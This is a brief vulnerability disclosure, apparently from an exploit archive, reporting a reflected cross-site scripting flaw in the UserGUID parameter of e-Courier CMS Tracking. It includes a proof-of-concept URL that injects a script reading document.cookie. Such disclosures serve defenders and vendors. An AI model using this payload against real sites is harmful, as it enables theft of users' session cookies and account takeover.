id: 9967
date: 11/03/2009
title: e-Courier CMS Tracking xss
author: BugsNotHugs
cves: 

==========================
e-Courier CMS Tracking xss
==========================

Vendor: e-Courier (http://www.ecouriersoftware.com/)
Product: CMS Tracking Site Issue: Cross-Site Scripting.
Description: Nearly all pages include the URI Parameter UserGUID,
which is not sanitized before being included in the response.
 
Example:
https://demo.e-courier.com/demo/home/index.asp?UserGUID="><script>alert(document.cookie)</script>
 
-- 
 
BugsNotHugs
Shared Vulnerability Disclosure Account


 
_______________________________________________

#  0day.today [2023-03-26]  #